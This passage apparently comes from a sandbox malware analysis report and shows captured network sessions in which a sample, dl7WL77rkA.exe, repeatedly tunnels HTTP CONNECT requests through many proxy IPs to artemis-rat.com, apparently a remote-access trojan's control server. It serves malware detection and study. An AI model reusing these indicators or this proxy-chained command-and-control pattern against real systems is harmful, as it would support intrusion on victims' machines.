                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1784192.168.2.554881222.223.103.23273023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.022723913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.368196011 CET90INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 55


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1785192.168.2.55482945.11.95.16550283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.023823023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1786192.168.2.554894186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.023823977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1787192.168.2.55490554.37.196.18980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.024517059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1788192.168.2.554895194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.024518013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1789192.168.2.55491135.199.90.22588883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.024847031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.523778915 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1790192.168.2.55490143.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.024907112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1791192.168.2.554994172.67.181.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.025244951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.179805040 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1792192.168.2.554896212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.025247097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1793192.168.2.55081382.210.56.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.025541067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207321882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389517069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1794192.168.2.555008172.67.36.21803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.025598049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.182279110 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1795192.168.2.5507833.21.101.15831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.027005911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.245055914 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1796192.168.2.55413551.75.126.150341443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.084163904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207549095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389517069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1797192.168.2.55491031.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.084636927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1798192.168.2.55501831.43.179.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.087480068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.243122101 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1799192.168.2.55490245.11.95.16550473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.088175058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1800192.168.2.554969196.20.125.14580833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.091784000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1801192.168.2.555023203.24.108.179803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.092176914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.249161959 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1802192.168.2.554934123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.092731953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1803192.168.2.554957167.172.86.46104713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.092735052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1804192.168.2.554980154.205.152.9690803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.093962908 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.701858997 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405296087 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702081919 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.202070951 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.701970100 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202130079 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.202109098 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1805192.168.2.554945125.94.219.9690913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.094372988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.431626081 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1806192.168.2.550785187.50.29.24280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.094700098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
